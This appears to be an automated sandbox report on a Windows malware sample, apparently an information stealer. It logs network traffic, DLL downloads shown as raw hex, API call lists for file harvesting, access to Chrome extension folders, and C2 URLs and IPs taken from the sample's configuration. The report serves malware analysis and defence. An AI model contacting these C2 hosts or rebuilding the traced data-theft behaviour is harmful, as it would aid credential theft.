Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64274 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64277 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64278 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64275 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64276 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64280 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64281 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64279 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64282 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64283 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64285 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64286 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64295 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64291 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64290 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64289 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64292 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64294 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64288 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64293 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64287 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64296 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64298 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64299 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64303 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64305 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64304 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64301 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64306 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64302 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64300 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64308 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64307 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64310 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64311 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64315 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64313 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64312 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64314 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64317 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64319 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64316 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64320 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64318 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64321 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64322 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64323 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64325 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64327 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64324 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64326 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64328 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64329 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64332 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64330 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64331 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64334 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64333 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64335 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64337 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64336 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64339 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64340 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64338 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64341 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64343 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64342 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64344 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64345 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64346 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64348 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64350 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64349 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64351 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64352 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64353 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64354 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64355 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64356 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64357 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64358 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64359 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64360 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64361 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64362 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64364 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64365 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64363 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64366 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64367 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64368 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64369 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64370 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64372 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64373 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64375 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64377 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: firefox.exe Memory has grown: Private usage: 0MB later: 95MB

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor URLs: http://85.28.47.31silence
Source: Malware configuration extractor IPs: 185.215.113.19
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 62
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.5:64037 -> 1.1.1.1:53
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 